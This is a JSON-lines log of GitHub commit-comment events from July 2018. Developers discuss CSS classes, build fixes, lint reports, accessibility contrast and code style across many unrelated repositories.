{"id":"7998674411","type":"CommitCommentEvent","actor":{"login":"AlOneill"},"repo":{"name":"FreeUKGen/MyopicVicar"},"payload":{"comment":{"id":29788782,"position":null,"line":null,"path":null,"commit_id":"c1e0081c5e2ec21f57cc57320e1991baf9e29ebc","created_at":"2018-07-21T14:17:16Z","updated_at":"2018-07-21T14:17:16Z","author_association":"NONE","body":"We already have a style that does the work of this new class, `strong`. However, the name of our existing style class is not obvious: it is `weight--semibold`"}},"created_at":"2018-07-21T14:17:16Z"}
{"id":"7998675868","type":"CommitCommentEvent","actor":{"login":"matthew-brett"},"repo":{"name":"MacPython/numpy-wheels"},"payload":{"comment":{"id":29788784,"position":null,"line":null,"path":null,"commit_id":"3d0da6b6acac050e67509ed6a469dba1602b1890","created_at":"2018-07-21T14:18:24Z","updated_at":"2018-07-21T14:18:24Z","author_association":"CONTRIBUTOR","body":"I think I've fixed the Mac build (by changing the name of the OpenBLAS library on Rackspace) and the double upload (by deleting my Appveyor project pointing to MacPython/numpy-wheels)."}},"created_at":"2018-07-21T14:18:24Z"}
{"id":"7998676745","type":"CommitCommentEvent","actor":{"login":"AlekseySapsay"},"repo":{"name":"AlekseySapsay/Hello-world1"},"payload":{"comment":{"id":29788787,"position":4,"line":4,"path":"README.md","commit_id":"d34a18220cb96811b7bb2dff5496667bc477bee9","created_at":"2018-07-21T14:19:06Z","updated_at":"2018-07-21T14:19:06Z","author_association":"OWNER","body":"Тут будет коментарий с багами"}},"created_at":"2018-07-21T14:19:06Z"}
{"id":"7998678051","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/plone-react"},"payload":{"comment":{"id":29788790,"position":null,"line":null,"path":null,"commit_id":"7b3f2b90db06e97f22d31cebd5f36b34cb414aeb","created_at":"2018-07-21T14:20:03Z","updated_at":"2018-07-21T14:20:03Z","author_association":"NONE","body":"Rob Gietema your emails are not known to GitHub and thus it is impossible to know if you have signed the Plone Contributor Agreement, which is required to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html How to add more emails to your GitHub account: https://help.github.com/articles/adding-an-email-address-to-your-github-account/ "}},"created_at":"2018-07-21T14:20:03Z"}
{"id":"7998678248","type":"CommitCommentEvent","actor":{"login":"ElGatoLoco"},"repo":{"name":"shomi2302/react_calc"},"payload":{"comment":{"id":29788791,"position":null,"line":null,"path":null,"commit_id":"17e6b9a6d7603f98fe3338da2513ddaa853fa46d","created_at":"2018-07-21T14:20:11Z","updated_at":"2018-07-21T14:20:11Z","author_association":"NONE","body":"Generalno je super sve ovo, samo vidi da ti što više komponenti budu funkcionalne. Logiku u container-e, u ovom slučaju kontam da je to samo App (ili što je tebi rootComponent), a ovima samo šalji prop-ove.\r\n\r\nJoš spiči dovlačenje ponude i gg. Kad budeš to odradio, vidi da dodaš neki debounce na tipa 300ms na pomeranje slider-a, jer nećeš hteti da se šalje request čim korisnik pomeri sa jedne vrednosti na sledeću. Ofc, tu je i keširanje za kraj, što i nije preveliki problem kad nisi mamuran. 😛\r\n\r\nKeep it gangsta i cimaj, ako treba pomoć. 🖖"}},"created_at":"2018-07-21T14:20:11Z"}
{"id":"7998678997","type":"CommitCommentEvent","actor":{"login":"Cranite"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29788792,"position":140,"line":140,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/EnchantmentEvents.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-21T14:20:42Z","updated_at":"2018-07-21T14:20:42Z","author_association":"NONE","body":"Done"}},"created_at":"2018-07-21T14:20:42Z"}
{"id":"7998679104","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29788793,"position":null,"line":null,"path":null,"commit_id":"8cfd8ed0c49e4b8c07c6a8d670f6b22443b21c7e","created_at":"2018-07-21T14:20:47Z","updated_at":"2018-07-21T14:20:47Z","author_association":"OWNER","body":"- MagicNumber /n- LongClass"}},"created_at":"2018-07-21T14:20:47Z"}
{"id":"7998680444","type":"CommitCommentEvent","actor":{"login":"krlmlr"},"repo":{"name":"ropensci/drake"},"payload":{"comment":{"id":29788795,"position":null,"line":null,"path":null,"commit_id":"6e3ee5adc43fc894738707e40c06baeb88665023","created_at":"2018-07-21T14:21:53Z","updated_at":"2018-07-21T14:21:53Z","author_association":"COLLABORATOR","body":"Thanks. The way I understand the code you pointed me to, `gc()` is called unconditionally. I'm suggesting to call it only after detecting that no new target is ready yet:\r\n\r\n1. build\r\n2. check if need to build new target\r\n3. if new target available, go to 1\r\n4. `gc()`\r\n5. go to 2"}},"created_at":"2018-07-21T14:21:53Z"}
{"id":"7998695253","type":"CommitCommentEvent","actor":{"login":"AlekseySapsay"},"repo":{"name":"AlekseySapsay/Hello-world1"},"payload":{"comment":{"id":29788818,"position":1,"line":1,"path":"README.md","commit_id":"a953b988a86394e5dfda36519f6d779feb225ed8","created_at":"2018-07-21T14:32:40Z","updated_at":"2018-07-21T14:32:40Z","author_association":"OWNER","body":"Тут может быть ваша реклама"}},"created_at":"2018-07-21T14:32:40Z"}
{"id":"7998695611","type":"CommitCommentEvent","actor":{"login":"krytarowski"},"repo":{"name":"R3x/src"},"payload":{"comment":{"id":29788819,"position":17,"line":85,"path":"sys/sys/boot_flag.h","commit_id":"b3345201f8a67439eca5b6edd2eee0537d2bd1b7","created_at":"2018-07-21T14:32:56Z","updated_at":"2018-07-21T14:32:56Z","author_association":"COLLABORATOR","body":"I would put 'A' after '4', before 'a'"}},"created_at":"2018-07-21T14:32:56Z"}
{"id":"7998695777","type":"CommitCommentEvent","actor":{"login":"AlekseySapsay"},"repo":{"name":"AlekseySapsay/Hello-world1"},"payload":{"comment":{"id":29788820,"position":1,"line":1,"path":"README.md","commit_id":"a953b988a86394e5dfda36519f6d779feb225ed8","created_at":"2018-07-21T14:33:05Z","updated_at":"2018-07-21T14:33:05Z","author_association":"OWNER","body":"Это просто коментарии к коду"}},"created_at":"2018-07-21T14:33:05Z"}
{"id":"7998696989","type":"CommitCommentEvent","actor":{"login":"AlekseySapsay"},"repo":{"name":"AlekseySapsay/Hello-world1"},"payload":{"comment":{"id":29788821,"position":null,"line":null,"path":null,"commit_id":"a953b988a86394e5dfda36519f6d779feb225ed8","created_at":"2018-07-21T14:34:01Z","updated_at":"2018-07-21T14:34:01Z","author_association":"OWNER","body":"А этот коментарий как будет отображаться?\r\n"}},"created_at":"2018-07-21T14:34:01Z"}
{"id":"7998699237","type":"CommitCommentEvent","actor":{"login":"sharkstoned"},"repo":{"name":"sharkstoned/marketplace"},"payload":{"comment":{"id":29788822,"position":24,"line":200,"path":"sixerr/settings.py","commit_id":"f4b7c5f585d3074f1f4856581a57a9d266f8c111","created_at":"2018-07-21T14:35:50Z","updated_at":"2018-07-21T14:35:50Z","author_association":"OWNER","body":"+"}},"created_at":"2018-07-21T14:35:50Z"}
{"id":"7998699824","type":"CommitCommentEvent","actor":{"login":"Ch4rg3r"},"repo":{"name":"jeremyVignelles/libvlcsharp"},"payload":{"comment":{"id":29788823,"position":null,"line":null,"path":null,"commit_id":"fe3252a6e4db2fdaad2a3e90aca24430ef3417cc","created_at":"2018-07-21T14:36:12Z","updated_at":"2018-07-21T14:36:12Z","author_association":"NONE","body":"Hi, great work. I started the same, didn't know you already done it. \r\nI can see this is also the GTK2 implementation.\r\nI have a question related to the Platform implementation as DrawingArea. It draws over the complete window right? Does it support any other controls, like WPF?"}},"created_at":"2018-07-21T14:36:12Z"}
{"id":"7998700040","type":"CommitCommentEvent","actor":{"login":"sharkstoned"},"repo":{"name":"sharkstoned/marketplace"},"payload":{"comment":{"id":29788824,"position":4,"line":17,"path":"sixerr/settings.py","commit_id":"f4b7c5f585d3074f1f4856581a57a9d266f8c111","created_at":"2018-07-21T14:36:20Z","updated_at":"2018-07-21T14:36:20Z","author_association":"OWNER","body":"+"}},"created_at":"2018-07-21T14:36:20Z"}
{"id":"7998702098","type":"CommitCommentEvent","actor":{"login":"Astridxx"},"repo":{"name":"arghyac35/android_device_lenovo_kuntao"},"payload":{"comment":{"id":29788826,"position":null,"line":null,"path":null,"commit_id":"5dd7b3c2930cbe94486305bb28ab134fa907b210","created_at":"2018-07-21T14:37:36Z","updated_at":"2018-07-21T14:37:36Z","author_association":"CONTRIBUTOR","body":"Wow :D"}},"created_at":"2018-07-21T14:37:36Z"}
{"id":"7998702474","type":"CommitCommentEvent","actor":{"login":"abrenoch"},"repo":{"name":"abrenoch/hyperion-android-grabber"},"payload":{"comment":{"id":29788827,"position":72,"line":130,"path":"common/src/main/java/com/abrenoch/hyperiongrabber/common/network/Hyperion.java","commit_id":"8e5b0b86e5f6b33ac2bcceb1d5e297773bf7774d","created_at":"2018-07-21T14:37:48Z","updated_at":"2018-07-21T14:37:48Z","author_association":"OWNER","body":"That is a great suggestion, I was wondering the best practice for making a debug build, but had not bothered to actually look anything up yet.\r\n\r\nThat is definitely something that I would like to add here & in the rest of the app, but I'll make a separate issue for it so it doesn't creep the scope (turn into something other than what was intended) of this PR.\r\n\r\nI'll merge this one in a little bit here. I'm pretty certain it is solid. We can address any new issues that _might_ arise after."}},"created_at":"2018-07-21T14:37:48Z"}
{"id":"7998704394","type":"CommitCommentEvent","actor":{"login":"Hacksore"},"repo":{"name":"bs-community/skinview3d"},"payload":{"comment":{"id":29788829,"position":13,"line":351,"path":"src/model.ts","commit_id":"3feb9cf9f65537abc7e24dfed418e4b5645ee490","created_at":"2018-07-21T14:38:51Z","updated_at":"2018-07-21T14:38:51Z","author_association":"COLLABORATOR","body":"Will be fixed in the next commit. "}},"created_at":"2018-07-21T14:38:51Z"}
{"id":"7998704762","type":"CommitCommentEvent","actor":{"login":"billybichon"},"repo":{"name":"billybichon/liveGQL"},"payload":{"comment":{"id":29788830,"position":null,"line":null,"path":null,"commit_id":"42154b200727e70a7556e3ca89b217407d9b1a70","created_at":"2018-07-21T14:39:07Z","updated_at":"2018-07-21T14:39:07Z","author_association":"OWNER","body":"I just added more error handling, can you try again, you might receive errors that might help."}},"created_at":"2018-07-21T14:39:07Z"}
{"id":"7998706329","type":"CommitCommentEvent","actor":{"login":"2uasimojo"},"repo":{"name":"cdent/os-resource-classes"},"payload":{"comment":{"id":29788831,"position":5,"line":5,"path":"os_resource_classes/__init__.py","commit_id":"e1094e23c3070e791f3f1a1f9837e1f7a42de862","created_at":"2018-07-21T14:40:16Z","updated_at":"2018-07-21T14:40:16Z","author_association":"NONE","body":"s/often/should always/ ?"}},"created_at":"2018-07-21T14:40:16Z"}
{"id":"7998706504","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29788832,"position":null,"line":null,"path":null,"commit_id":"8cfd8ed0c49e4b8c07c6a8d670f6b22443b21c7e","created_at":"2018-07-21T14:40:22Z","updated_at":"2018-07-21T14:40:22Z","author_association":"OWNER","body":"MagicNumber - [num] at /Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/MainActivity.kt:13:21 - Signature=MainActivity.kt$MainActivity$7 MagicNumber - [<anonymous>] at /Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/MainActivity.kt:22:22 - Signature=MainActivity.kt$MainActivity$5"}},"created_at":"2018-07-21T14:40:22Z"}
{"id":"7998709394","type":"CommitCommentEvent","actor":{"login":"SRL-Lama"},"repo":{"name":"SRL-Lama/SRL-6-Scripts"},"payload":{"comment":{"id":29788835,"position":null,"line":null,"path":null,"commit_id":"15d157cec998b8476d49f738b329a0c3ee737efb","created_at":"2018-07-21T14:42:32Z","updated_at":"2018-07-21T14:42:32Z","author_association":"OWNER","body":"that login info isn't valid btw lmaoo you fools."}},"created_at":"2018-07-21T14:42:32Z"}
{"id":"7998709680","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.behavior"},"payload":{"comment":{"id":29788836,"position":null,"line":null,"path":null,"commit_id":"1e54cc92a7c640dbe6ed9746a70acb92a6437472","created_at":"2018-07-21T14:42:44Z","updated_at":"2018-07-21T14:42:44Z","author_association":"NONE","body":"@gforcada Jenkins CI reporting about code analysis\nSee the full report here: https://jenkins.plone.org/job/package-plone.behavior/10/violations\n```\nplone/behavior/metaconfigure.py:83:65: C812 missing trailing comma\nplone/behavior/metaconfigure.py:106:71: C812 missing trailing comma\nplone/behavior/metaconfigure.py:111:25: C812 missing trailing comma\nplone/behavior/metaconfigure.py:137:35: C812 missing trailing comma\nplone/behavior/metaconfigure.py:149:35: C812 missing trailing comma\nplone/behavior/metaconfigure.py:156:73: C812 missing trailing comma\nplone/behavior/metaconfigure.py:169:21: C812 missing trailing comma\nplone/behavior/interfaces.py:33:22: C812 missing trailing comma\nplone/behavior/interfaces.py:38:23: C812 missing trailing comma\nplone/behavior/interfaces.py:46:23: C812 missing trailing comma\nplone/behavior/interfaces.py:52:26: C812 missing trailing comma\nplone/behavior/interfaces.py:62:26: C812 missing trailing comma\nplone/behavior/interfaces.py:68:25: C812 missing trailing comma\nplone/behavior/interfaces.py:89:25: C812 missing trailing comma\nplone/behavior/registration.py:56:39: C812 missing trailing comma\nplone/behavior/registration.py:57:14: C812 missing trailing comma\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2018-07-21T14:42:44Z"}
{"id":"7998709832","type":"CommitCommentEvent","actor":{"login":"Gorhom"},"repo":{"name":"infinitered/ignite-ir-boilerplate-bowser"},"payload":{"comment":{"id":29788837,"position":null,"line":null,"path":null,"commit_id":"65653a955e4f01953bbc6d7acc84b36c51d8db05","created_at":"2018-07-21T14:42:51Z","updated_at":"2018-07-21T14:42:51Z","author_association":"NONE","body":"@skellock i have created a pull request to support latest React Navigation 👍\r\nhttps://github.com/infinitered/ignite-ir-boilerplate-bowser/pull/57"}},"created_at":"2018-07-21T14:42:51Z"}
{"id":"7998709834","type":"CommitCommentEvent","actor":{"login":"AlOneill"},"repo":{"name":"FreeUKGen/MyopicVicar"},"payload":{"comment":{"id":29788838,"position":null,"line":null,"path":null,"commit_id":"2e29302c4c8c48cbec8f234ec019e3b44f3400f8","created_at":"2018-07-21T14:42:51Z","updated_at":"2018-07-21T14:42:51Z","author_association":"NONE","body":"Not sure I understand exactly how/where the CSS class `link_disabled` will be used, but our current link colour (#10c8a5) has extremely low contrast with #a5a5a5 of 1.15:1. With the new link colour, the contrast will be 1.84:1 whereas our target for accessibility is 4.5:1\r\n\r\nThese low contrasts may or may not work for our existing members, but once we allow Researchers to register, such low contrasts would be a definite fail."}},"created_at":"2018-07-21T14:42:51Z"}
{"id":"7998709892","type":"CommitCommentEvent","actor":{"login":"2uasimojo"},"repo":{"name":"cdent/os-resource-classes"},"payload":{"comment":{"id":29788839,"position":23,"line":23,"path":"os_resource_classes/__init__.py","commit_id":"e1094e23c3070e791f3f1a1f9837e1f7a42de862","created_at":"2018-07-21T14:42:54Z","updated_at":"2018-07-21T14:42:54Z","author_association":"NONE","body":"Wolud prefer to number explicitly (and potentially do the creation with explicit IDs in placement itself)."}},"created_at":"2018-07-21T14:42:54Z"}
{"id":"7998713638","type":"CommitCommentEvent","actor":{"login":"CreeperKong"},"repo":{"name":"electron/electron"},"payload":{"comment":{"id":29788847,"position":4,"line":351,"path":"lib/browser/guest-view-manager.js","commit_id":"4333020157f3041f812881cf4775d041c3ca7bfe","created_at":"2018-07-21T14:45:38Z","updated_at":"2018-07-21T14:45:38Z","author_association":"NONE","body":"That‘s great!"}},"created_at":"2018-07-21T14:45:38Z"}
{"id":"7998713878","type":"CommitCommentEvent","actor":{"login":"2uasimojo"},"repo":{"name":"cdent/os-resource-classes"},"payload":{"comment":{"id":29788848,"position":26,"line":53,"path":"os_resource_classes/__init__.py","commit_id":"bd5d3eb786eed887f94ac7b93081c4f2d245e760","created_at":"2018-07-21T14:45:49Z","updated_at":"2018-07-21T14:45:49Z","author_association":"NONE","body":"Add normalize_name method (see nova.rc_fields.ResourceClass.normalize_name)"}},"created_at":"2018-07-21T14:45:49Z"}
{"id":"7998714507","type":"CommitCommentEvent","actor":{"login":"fabianmoronzirfas"},"repo":{"name":"ExtendScript/extendscriptr"},"payload":{"comment":{"id":29788849,"position":14,"line":45,"path":"package.json","commit_id":"34ae35f6ae14a704668e04d64002e1f9ec8d54ee","created_at":"2018-07-21T14:46:15Z","updated_at":"2018-07-21T14:46:15Z","author_association":"MEMBER","body":"@GitBruno What was the idea of having this package as dependency? The global install works without it."}},"created_at":"2018-07-21T14:46:15Z"}
{"id":"7998714922","type":"CommitCommentEvent","actor":{"login":"Ingvord"},"repo":{"name":"tango-controls/JTango"},"payload":{"comment":{"id":29788850,"position":149,"line":240,"path":"server/src/main/java/org/tango/server/dynamic/DynamicManager.java","commit_id":"b8ac04edffdee715518b54bf93dd7e1994de5c9c","created_at":"2018-07-21T14:46:33Z","updated_at":"2018-07-21T14:46:33Z","author_association":"MEMBER","body":"I would write it in other way:\r\n\r\n```java\r\nDynamicAttribute attr = dynamicAttributes.get(attributeName.toLowerCase(Locale.ENGLISH));\r\nif(attr == null) return null;\r\nelse return attr.getBehavior();\r\n```"}},"created_at":"2018-07-21T14:46:33Z"}
{"id":"7998715475","type":"CommitCommentEvent","actor":{"login":"CreeperKong"},"repo":{"name":"electron/electron"},"payload":{"comment":{"id":29788851,"position":8,"line":355,"path":"lib/browser/guest-view-manager.js","commit_id":"4333020157f3041f812881cf4775d041c3ca7bfe","created_at":"2018-07-21T14:46:58Z","updated_at":"2018-07-21T14:46:58Z","author_association":"NONE","body":"This is a function I had waited for a long time"}},"created_at":"2018-07-21T14:46:58Z"}
{"id":"7998715856","type":"CommitCommentEvent","actor":{"login":"2uasimojo"},"repo":{"name":"cdent/os-resource-classes"},"payload":{"comment":{"id":29788852,"position":null,"line":null,"path":null,"commit_id":"750177b920ea80135af510a85561ae2e80d3eddf","created_at":"2018-07-21T14:47:16Z","updated_at":"2018-07-21T14:47:16Z","author_association":"NONE","body":"I like this *vastly* simpler approach to os-resource-classes. Need to give some thought as to whether Jay's deprecation framework is worth the added complexity."}},"created_at":"2018-07-21T14:47:16Z"}
{"id":"7998716298","type":"CommitCommentEvent","actor":{"login":"tpalanimca"},"repo":{"name":"tpalanimca/gitrevert"},"payload":{"comment":{"id":29788853,"position":null,"line":null,"path":null,"commit_id":"bc9f19c2547340c4e8bbfce8270cab58b334e8f0","created_at":"2018-07-21T14:47:37Z","updated_at":"2018-07-21T14:47:37Z","author_association":"OWNER","body":"this is the sampel for reset"}},"created_at":"2018-07-21T14:47:37Z"}
{"id":"7998717296","type":"CommitCommentEvent","actor":{"login":"chenli124147"},"repo":{"name":"chenli124147/learnGit"},"payload":{"comment":{"id":29788854,"position":null,"line":null,"path":null,"commit_id":"5e545ea375a8a080fbd7a6aa96961fc2b54cd997","created_at":"2018-07-21T14:48:25Z","updated_at":"2018-07-21T14:48:25Z","author_association":"OWNER","body":"fafsg"}},"created_at":"2018-07-21T14:48:25Z"}
{"id":"7998722070","type":"CommitCommentEvent","actor":{"login":"tpalanimca"},"repo":{"name":"tpalanimca/gitrevert"},"payload":{"comment":{"id":29788857,"position":null,"line":null,"path":null,"commit_id":"bc9f19c2547340c4e8bbfce8270cab58b334e8f0","created_at":"2018-07-21T14:52:00Z","updated_at":"2018-07-21T14:52:00Z","author_association":"OWNER","body":"test code"}},"created_at":"2018-07-21T14:52:00Z"}
{"id":"7998727628","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"double-beep/Stockfish"},"payload":{"comment":{"id":29788861,"position":null,"line":null,"path":null,"commit_id":"613dbbafa1481b6409b46ffd1f3a1ef0ea286f11","created_at":"2018-07-21T14:56:12Z","updated_at":"2018-07-21T14:56:12Z","author_association":"NONE","body":"@double-beep \r\nAs Alain pointed out this 2000 games test makes no sense because of the error bar\r\nI have deleted this LTC. Start with a standard STC SPRT[0,4] test as proposed. But you should read the testing guide line and ask if you have further questions::\r\nhttps://github.com/glinscott/fishtest/wiki/Creating-my-first-test\r\n"}},"created_at":"2018-07-21T14:56:12Z"}
{"id":"7998731506","type":"CommitCommentEvent","actor":{"login":"AlOneill"},"repo":{"name":"FreeUKGen/MyopicVicar"},"payload":{"comment":{"id":29788862,"position":null,"line":null,"path":null,"commit_id":"2e29302c4c8c48cbec8f234ec019e3b44f3400f8","created_at":"2018-07-21T14:59:01Z","updated_at":"2018-07-21T14:59:01Z","author_association":"NONE","body":"Not sure I understand exactly how/where the CSS class `link_disabled` will be used, but our current link colour (#10c8a5) has extremely low contrast with #a5a5a5 of 1.15:1. With the new link colour, the contrast will be 1.84:1 whereas our target for accessibility is 4.5:1\r\n\r\nThese low contrasts may or may not work for our existing members, but once we allow Researchers to register, such low contrasts would be a definite fail.\r\n\r\nMy suggestion would be to change the link colour to the palest accessible grey (on white background) of #757575 and perhaps also make link text italic to emphasise that this is not a normal link."}},"created_at":"2018-07-21T14:59:01Z"}
{"id":"7998733876","type":"CommitCommentEvent","actor":{"login":"creslinux"},"repo":{"name":"creslinux/freqtrade"},"payload":{"comment":{"id":29788870,"position":null,"line":null,"path":null,"commit_id":"3008db538a2ab06352de1fa2f42a60bf8c158955","created_at":"2018-07-21T15:00:38Z","updated_at":"2018-07-21T15:00:38Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-21T15:00:38Z"}
{"id":"7998733947","type":"CommitCommentEvent","actor":{"login":"Jonacity"},"repo":{"name":"haseebc/ceziamnew"},"payload":{"comment":{"id":29788871,"position":3,"line":3,"path":"db/migrate/20180716163120_add_domcheck_duration_to_checks.rb","commit_id":"74eb046916457cc84bb72373fcea4c61d4c78d97","created_at":"2018-07-21T15:00:40Z","updated_at":"2018-07-21T15:00:40Z","author_association":"COLLABORATOR","body":"What is this new field used for ?"}},"created_at":"2018-07-21T15:00:40Z"}
{"id":"7998734386","type":"CommitCommentEvent","actor":{"login":"Alberto96"},"repo":{"name":"GearLabs/android_frameworks_native"},"payload":{"comment":{"id":29788872,"position":null,"line":null,"path":null,"commit_id":"0eb0acec3c68ad5be7f3423e8ac1e30b89b8a9c8","created_at":"2018-07-21T15:00:58Z","updated_at":"2018-07-21T15:00:58Z","author_association":"MEMBER","body":"DO NOT USE!"}},"created_at":"2018-07-21T15:00:58Z"}
{"id":"7998734871","type":"CommitCommentEvent","actor":{"login":"2uasimojo"},"repo":{"name":"cdent/os-resource-classes"},"payload":{"comment":{"id":29788873,"position":21,"line":48,"path":"os_resource_classes/__init__.py","commit_id":"bd5d3eb786eed887f94ac7b93081c4f2d245e760","created_at":"2018-07-21T15:01:20Z","updated_at":"2018-07-21T15:01:20Z","author_association":"NONE","body":"It's weird to me that there are symbols that otherwise conform to what a resource class looks like, in the same namespace as resource classes, that aren't resource classes.\r\n\r\nI get that it's nice to have all the resource class symbols sitting in the root of the package, but have we considered isolating the actual resource classes into their own namespace, like os_resource_classes.resource_classes.* ?"}},"created_at":"2018-07-21T15:01:20Z"}
{"id":"7998737024","type":"CommitCommentEvent","actor":{"login":"jeremyVignelles"},"repo":{"name":"jeremyVignelles/libvlcsharp"},"payload":{"comment":{"id":29788876,"position":null,"line":null,"path":null,"commit_id":"fe3252a6e4db2fdaad2a3e90aca24430ef3417cc","created_at":"2018-07-21T15:02:55Z","updated_at":"2018-07-21T15:02:55Z","author_association":"OWNER","body":"Hello, thanks for your interest. I've seen your issue on code.v.o, but I'm not at home right now.\r\nQuick answers:\r\n- It's a mono/gtk-sharp implementation rather than gtk-sharp/gtk-sharp, because Xamarin.Forms.Gtk is based on that one\r\n- I'm not a gtk expert, but it seemed to me that it was the way you create user controls you draw yourself in gtk. At least, it was implemented that way in the libvlc + gtk samples I've seen. After that, you add your drawing area where you want as any other control in your app"}},"created_at":"2018-07-21T15:02:55Z"}
{"id":"7998738612","type":"CommitCommentEvent","actor":{"login":"Heizmann"},"repo":{"name":"ultimate-pa/ultimate"},"payload":{"comment":{"id":29788878,"position":1,"line":9,"path":"trunk/examples/Backtranslation/regression/c/standard/Generic.epf","commit_id":"5130a15a361a51680b8bb9ce5652b34c718f8696","created_at":"2018-07-21T15:04:03Z","updated_at":"2018-07-21T15:04:03Z","author_association":"MEMBER","body":"@danieldietsch @schillic @alexandernutz Please raise concerns if you do not like this and my preceding commit\r\nbtw. I was especially surpised that the `InterpolantAutomatonBuilderFactory` was silently throwing away interpolant sequences if CANONICAL (the former default) was set."}},"created_at":"2018-07-21T15:04:03Z"}
{"id":"7998739488","type":"CommitCommentEvent","actor":{"login":"xdevs23"},"repo":{"name":"AOSiP/platform_frameworks_base"},"payload":{"comment":{"id":29788879,"position":null,"line":null,"path":null,"commit_id":"9177951ff58f0fe5dedff520975f004c2413458a","created_at":"2018-07-21T15:04:44Z","updated_at":"2018-07-21T15:04:44Z","author_association":"CONTRIBUTOR","body":"So you just randomly reverted some commits with the hope it would fix your issue and now I can pick this without conflicts and I still don't know if it's going to fix my issue xD"}},"created_at":"2018-07-21T15:04:44Z"}
{"id":"7998740384","type":"CommitCommentEvent","actor":{"login":"Samuelchen85"},"repo":{"name":"Samuelchen85/solidity"},"payload":{"comment":{"id":29788881,"position":null,"line":null,"path":null,"commit_id":"cb5e06d4df01926328989f9ce0911e51ef6fcf3c","created_at":"2018-07-21T15:05:23Z","updated_at":"2018-07-21T15:05:23Z","author_association":"OWNER","body":"So sorry, committed to wrong place, please ignore it. "}},"created_at":"2018-07-21T15:05:23Z"}
{"id":"7998741663","type":"CommitCommentEvent","actor":{"login":"Pathasarathy51tg"},"repo":{"name":"Pathasarathy51tg/code18trial"},"payload":{"comment":{"id":29788882,"position":null,"line":null,"path":null,"commit_id":"22360b0018d3eedc02e3dd3eee7bf37d18072af6","created_at":"2018-07-21T15:06:16Z","updated_at":"2018-07-21T15:06:16Z","author_association":"OWNER","body":"testing branch"}},"created_at":"2018-07-21T15:06:16Z"}
{"id":"7998742896","type":"CommitCommentEvent","actor":{"login":"2uasimojo"},"repo":{"name":"cdent/os-resource-classes"},"payload":{"comment":{"id":29788883,"position":28,"line":28,"path":"os_resource_classes/__init__.py","commit_id":"e1094e23c3070e791f3f1a1f9837e1f7a42de862","created_at":"2018-07-21T15:07:08Z","updated_at":"2018-07-21T15:07:08Z","author_association":"NONE","body":"Is there a reason this can't/shouldn't be called STANDARD?"}},"created_at":"2018-07-21T15:07:08Z"}
{"id":"7998745111","type":"CommitCommentEvent","actor":{"login":"kraileth"},"repo":{"name":"jrmarino/ravensource"},"payload":{"comment":{"id":29788884,"position":null,"line":null,"path":null,"commit_id":"5b884f9ee35fd37cae5fff952141f126e186d892","created_at":"2018-07-21T15:08:42Z","updated_at":"2018-07-21T15:08:42Z","author_association":"COLLABORATOR","body":"I can't get this to work unfortunately. Commenting out the do-install part and using _INSTALL_WRKSRC= {{WRKDIR}}/.build_ kind of works - the program files are actually installed. Unfortunately they are installed to /raven/xyz instead to ${STAGEDIR}. Making \"DESTDIR=${STAGEDIR} install\" works around this. How would I tell Raven to pass in DESTDIR when making \"install\"?"}},"created_at":"2018-07-21T15:08:42Z"}
{"id":"7998745980","type":"CommitCommentEvent","actor":{"login":"Ch4rg3r"},"repo":{"name":"jeremyVignelles/libvlcsharp"},"payload":{"comment":{"id":29788887,"position":null,"line":null,"path":null,"commit_id":"fe3252a6e4db2fdaad2a3e90aca24430ef3417cc","created_at":"2018-07-21T15:09:23Z","updated_at":"2018-07-21T15:09:23Z","author_association":"NONE","body":"Ok thanks. I wil check it out"}},"created_at":"2018-07-21T15:09:23Z"}
{"id":"7998747090","type":"CommitCommentEvent","actor":{"login":"pradeep5007"},"repo":{"name":"gepb2603/ProgrammingAssignment2"},"payload":{"comment":{"id":29788888,"position":74,"line":59,"path":"cachematrix.R","commit_id":"20bd9847d8890ce22374c55e454ba051aca3b271","created_at":"2018-07-21T15:09:58Z","updated_at":"2018-07-21T15:09:58Z","author_association":"NONE","body":"+1 on the above comment"}},"created_at":"2018-07-21T15:09:58Z"}
{"id":"7998751656","type":"CommitCommentEvent","actor":{"login":"jeremyVignelles"},"repo":{"name":"jeremyVignelles/libvlcsharp"},"payload":{"comment":{"id":29788893,"position":null,"line":null,"path":null,"commit_id":"fe3252a6e4db2fdaad2a3e90aca24430ef3417cc","created_at":"2018-07-21T15:13:15Z","updated_at":"2018-07-21T15:13:15Z","author_association":"OWNER","body":"I still haven't implemented the mac OS version. If you have a mac, it will be helpful, else, i'll let @mfkl handle that"}},"created_at":"2018-07-21T15:13:15Z"}
{"id":"7998752637","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29788895,"position":null,"line":null,"path":null,"commit_id":"8cfd8ed0c49e4b8c07c6a8d670f6b22443b21c7e","created_at":"2018-07-21T15:13:57Z","updated_at":"2018-07-21T15:13:57Z","author_association":"OWNER","body":"Detekt report\n- MagicNumber - [num] at /Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/MainActivity.kt:13:21 - Signature=MainActivity.kt$MainActivity$7\n- MagicNumber - [<anonymous>] at /Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/MainActivity.kt:22:22 - Signature=MainActivity.kt$MainActivity$5\n"}},"created_at":"2018-07-21T15:13:57Z"}
